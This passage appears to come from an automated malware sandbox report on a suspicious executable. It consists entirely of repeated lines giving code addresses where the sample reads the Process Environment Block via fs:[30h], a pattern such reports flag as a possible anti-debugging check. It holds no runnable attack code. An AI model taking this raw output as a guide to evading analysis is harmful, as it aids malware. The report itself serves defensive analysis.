Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D0185 mov eax, dword ptr fs:[00000030h]	4_2_011D0185
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01234180 mov eax, dword ptr fs:[00000030h]	4_2_01234180
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01234180 mov eax, dword ptr fs:[00000030h]	4_2_01234180
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0124C188 mov eax, dword ptr fs:[00000030h]	4_2_0124C188
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0124C188 mov eax, dword ptr fs:[00000030h]	4_2_0124C188
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121019F mov eax, dword ptr fs:[00000030h]	4_2_0121019F
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121019F mov eax, dword ptr fs:[00000030h]	4_2_0121019F
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121019F mov eax, dword ptr fs:[00000030h]	4_2_0121019F
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121019F mov eax, dword ptr fs:[00000030h]	4_2_0121019F
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012661E5 mov eax, dword ptr fs:[00000030h]	4_2_012661E5
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C01F8 mov eax, dword ptr fs:[00000030h]	4_2_011C01F8
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012561C3 mov eax, dword ptr fs:[00000030h]	4_2_012561C3
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012561C3 mov eax, dword ptr fs:[00000030h]	4_2_012561C3
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0120E1D0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0120E1D0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120E1D0 mov ecx, dword ptr fs:[00000030h]	4_2_0120E1D0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0120E1D0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0120E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0120E1D0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011AE016 mov eax, dword ptr fs:[00000030h]	4_2_011AE016
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011AE016 mov eax, dword ptr fs:[00000030h]	4_2_011AE016
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011AE016 mov eax, dword ptr fs:[00000030h]	4_2_011AE016
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011AE016 mov eax, dword ptr fs:[00000030h]	4_2_011AE016
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01226030 mov eax, dword ptr fs:[00000030h]	4_2_01226030
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01214000 mov ecx, dword ptr fs:[00000030h]	4_2_01214000
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01232000 mov eax, dword ptr fs:[00000030h]	4_2_01232000
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01232000 mov eax, dword ptr fs:[00000030h]	4_2_01232000
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01232000 mov eax, dword ptr fs:[00000030h]	4_2_01232000
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01232000 mov eax, dword ptr fs:[00000030h]	4_2_01232000
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01232000 mov eax, dword ptr fs:[00000030h]	4_2_01232000
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01232000 mov eax, dword ptr fs:[00000030h]	4_2_01232000
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01232000 mov eax, dword ptr fs:[00000030h]	4_2_01232000
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01232000 mov eax, dword ptr fs:[00000030h]	4_2_01232000
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118A020 mov eax, dword ptr fs:[00000030h]	4_2_0118A020
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118C020 mov eax, dword ptr fs:[00000030h]	4_2_0118C020
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01192050 mov eax, dword ptr fs:[00000030h]	4_2_01192050
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BC073 mov eax, dword ptr fs:[00000030h]	4_2_011BC073
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01216050 mov eax, dword ptr fs:[00000030h]	4_2_01216050
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012280A8 mov eax, dword ptr fs:[00000030h]	4_2_012280A8
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119208A mov eax, dword ptr fs:[00000030h]	4_2_0119208A
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012560B8 mov eax, dword ptr fs:[00000030h]	4_2_012560B8
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012560B8 mov ecx, dword ptr fs:[00000030h]	4_2_012560B8
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011880A0 mov eax, dword ptr fs:[00000030h]	4_2_011880A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012160E0 mov eax, dword ptr fs:[00000030h]	4_2_012160E0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118C0F0 mov eax, dword ptr fs:[00000030h]	4_2_0118C0F0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011D20F0 mov ecx, dword ptr fs:[00000030h]	4_2_011D20F0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011980E9 mov eax, dword ptr fs:[00000030h]	4_2_011980E9
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118A0E3 mov ecx, dword ptr fs:[00000030h]	4_2_0118A0E3
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012120DE mov eax, dword ptr fs:[00000030h]	4_2_012120DE
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01268324 mov eax, dword ptr fs:[00000030h]	4_2_01268324
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01268324 mov ecx, dword ptr fs:[00000030h]	4_2_01268324
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01268324 mov eax, dword ptr fs:[00000030h]	4_2_01268324
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01268324 mov eax, dword ptr fs:[00000030h]	4_2_01268324
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118C310 mov ecx, dword ptr fs:[00000030h]	4_2_0118C310
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B0310 mov ecx, dword ptr fs:[00000030h]	4_2_011B0310
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CA30B mov eax, dword ptr fs:[00000030h]	4_2_011CA30B
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CA30B mov eax, dword ptr fs:[00000030h]	4_2_011CA30B
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CA30B mov eax, dword ptr fs:[00000030h]	4_2_011CA30B
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123437C mov eax, dword ptr fs:[00000030h]	4_2_0123437C
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]	4_2_01212349
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]	4_2_01212349
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]	4_2_01212349
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]	4_2_01212349
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]	4_2_01212349
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]	4_2_01212349
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]	4_2_01212349
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]	4_2_01212349
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]	4_2_01212349
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]	4_2_01212349
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]	4_2_01212349
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]	4_2_01212349
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]	4_2_01212349
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]	4_2_01212349
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01212349 mov eax, dword ptr fs:[00000030h]	4_2_01212349
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0126634F mov eax, dword ptr fs:[00000030h]	4_2_0126634F
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01238350 mov ecx, dword ptr fs:[00000030h]	4_2_01238350
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0125A352 mov eax, dword ptr fs:[00000030h]	4_2_0125A352
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121035C mov eax, dword ptr fs:[00000030h]	4_2_0121035C
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121035C mov eax, dword ptr fs:[00000030h]	4_2_0121035C
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121035C mov eax, dword ptr fs:[00000030h]	4_2_0121035C
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121035C mov ecx, dword ptr fs:[00000030h]	4_2_0121035C
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121035C mov eax, dword ptr fs:[00000030h]	4_2_0121035C
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0121035C mov eax, dword ptr fs:[00000030h]	4_2_0121035C
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01188397 mov eax, dword ptr fs:[00000030h]	4_2_01188397
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01188397 mov eax, dword ptr fs:[00000030h]	4_2_01188397
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01188397 mov eax, dword ptr fs:[00000030h]	4_2_01188397
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118E388 mov eax, dword ptr fs:[00000030h]	4_2_0118E388
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118E388 mov eax, dword ptr fs:[00000030h]	4_2_0118E388
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118E388 mov eax, dword ptr fs:[00000030h]	4_2_0118E388
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B438F mov eax, dword ptr fs:[00000030h]	4_2_011B438F
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011B438F mov eax, dword ptr fs:[00000030h]	4_2_011B438F
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0119A3C0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0119A3C0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0119A3C0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0119A3C0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0119A3C0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0119A3C0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011983C0 mov eax, dword ptr fs:[00000030h]	4_2_011983C0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011983C0 mov eax, dword ptr fs:[00000030h]	4_2_011983C0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011983C0 mov eax, dword ptr fs:[00000030h]	4_2_011983C0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011983C0 mov eax, dword ptr fs:[00000030h]	4_2_011983C0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012163C0 mov eax, dword ptr fs:[00000030h]	4_2_012163C0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C63FF mov eax, dword ptr fs:[00000030h]	4_2_011C63FF
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0124C3CD mov eax, dword ptr fs:[00000030h]	4_2_0124C3CD
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011AE3F0 mov eax, dword ptr fs:[00000030h]	4_2_011AE3F0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011AE3F0 mov eax, dword ptr fs:[00000030h]	4_2_011AE3F0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011AE3F0 mov eax, dword ptr fs:[00000030h]	4_2_011AE3F0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]	4_2_011A03E9
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]	4_2_011A03E9
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]	4_2_011A03E9
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]	4_2_011A03E9
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]	4_2_011A03E9
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]	4_2_011A03E9
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]	4_2_011A03E9
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A03E9 mov eax, dword ptr fs:[00000030h]	4_2_011A03E9
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012343D4 mov eax, dword ptr fs:[00000030h]	4_2_012343D4
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012343D4 mov eax, dword ptr fs:[00000030h]	4_2_012343D4
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123E3DB mov eax, dword ptr fs:[00000030h]	4_2_0123E3DB
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123E3DB mov eax, dword ptr fs:[00000030h]	4_2_0123E3DB
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123E3DB mov ecx, dword ptr fs:[00000030h]	4_2_0123E3DB
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123E3DB mov eax, dword ptr fs:[00000030h]	4_2_0123E3DB
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118823B mov eax, dword ptr fs:[00000030h]	4_2_0118823B
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01196259 mov eax, dword ptr fs:[00000030h]	4_2_01196259
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118A250 mov eax, dword ptr fs:[00000030h]	4_2_0118A250
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]	4_2_01240274
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]	4_2_01240274
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]	4_2_01240274
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]	4_2_01240274
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]	4_2_01240274
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]	4_2_01240274
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]	4_2_01240274
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]	4_2_01240274
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]	4_2_01240274
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]	4_2_01240274
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]	4_2_01240274
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01240274 mov eax, dword ptr fs:[00000030h]	4_2_01240274
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01218243 mov eax, dword ptr fs:[00000030h]	4_2_01218243
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01218243 mov ecx, dword ptr fs:[00000030h]	4_2_01218243
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118826B mov eax, dword ptr fs:[00000030h]	4_2_0118826B
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0124A250 mov eax, dword ptr fs:[00000030h]	4_2_0124A250
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0124A250 mov eax, dword ptr fs:[00000030h]	4_2_0124A250
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01194260 mov eax, dword ptr fs:[00000030h]	4_2_01194260
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01194260 mov eax, dword ptr fs:[00000030h]	4_2_01194260
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01194260 mov eax, dword ptr fs:[00000030h]	4_2_01194260
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0126625D mov eax, dword ptr fs:[00000030h]	4_2_0126625D
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012262A0 mov eax, dword ptr fs:[00000030h]	4_2_012262A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012262A0 mov ecx, dword ptr fs:[00000030h]	4_2_012262A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012262A0 mov eax, dword ptr fs:[00000030h]	4_2_012262A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012262A0 mov eax, dword ptr fs:[00000030h]	4_2_012262A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012262A0 mov eax, dword ptr fs:[00000030h]	4_2_012262A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012262A0 mov eax, dword ptr fs:[00000030h]	4_2_012262A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CE284 mov eax, dword ptr fs:[00000030h]	4_2_011CE284
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011CE284 mov eax, dword ptr fs:[00000030h]	4_2_011CE284
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01210283 mov eax, dword ptr fs:[00000030h]	4_2_01210283
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01210283 mov eax, dword ptr fs:[00000030h]	4_2_01210283
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01210283 mov eax, dword ptr fs:[00000030h]	4_2_01210283
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A02A0 mov eax, dword ptr fs:[00000030h]	4_2_011A02A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A02A0 mov eax, dword ptr fs:[00000030h]	4_2_011A02A0
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0119A2C3
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0119A2C3
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0119A2C3
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0119A2C3
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0119A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0119A2C3
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_012662D6 mov eax, dword ptr fs:[00000030h]	4_2_012662D6
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A02E1 mov eax, dword ptr fs:[00000030h]	4_2_011A02E1
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A02E1 mov eax, dword ptr fs:[00000030h]	4_2_011A02E1
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A02E1 mov eax, dword ptr fs:[00000030h]	4_2_011A02E1
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01226500 mov eax, dword ptr fs:[00000030h]	4_2_01226500
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BE53E mov eax, dword ptr fs:[00000030h]	4_2_011BE53E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BE53E mov eax, dword ptr fs:[00000030h]	4_2_011BE53E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BE53E mov eax, dword ptr fs:[00000030h]	4_2_011BE53E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BE53E mov eax, dword ptr fs:[00000030h]	4_2_011BE53E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011BE53E mov eax, dword ptr fs:[00000030h]	4_2_011BE53E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01264500 mov eax, dword ptr fs:[00000030h]	4_2_01264500
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01264500 mov eax, dword ptr fs:[00000030h]	4_2_01264500
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01264500 mov eax, dword ptr fs:[00000030h]	4_2_01264500
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01264500 mov eax, dword ptr fs:[00000030h]	4_2_01264500
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01264500 mov eax, dword ptr fs:[00000030h]	4_2_01264500
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01264500 mov eax, dword ptr fs:[00000030h]	4_2_01264500
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01264500 mov eax, dword ptr fs:[00000030h]	4_2_01264500
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0535 mov eax, dword ptr fs:[00000030h]	4_2_011A0535
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0535 mov eax, dword ptr fs:[00000030h]	4_2_011A0535
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0535 mov eax, dword ptr fs:[00000030h]	4_2_011A0535
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0535 mov eax, dword ptr fs:[00000030h]	4_2_011A0535
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0535 mov eax, dword ptr fs:[00000030h]	4_2_011A0535
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011A0535 mov eax, dword ptr fs:[00000030h]	4_2_011A0535
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01198550 mov eax, dword ptr fs:[00000030h]	4_2_01198550
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01198550 mov eax, dword ptr fs:[00000030h]	4_2_01198550
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C656A mov eax, dword ptr fs:[00000030h]	4_2_011C656A
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C656A mov eax, dword ptr fs:[00000030h]	4_2_011C656A
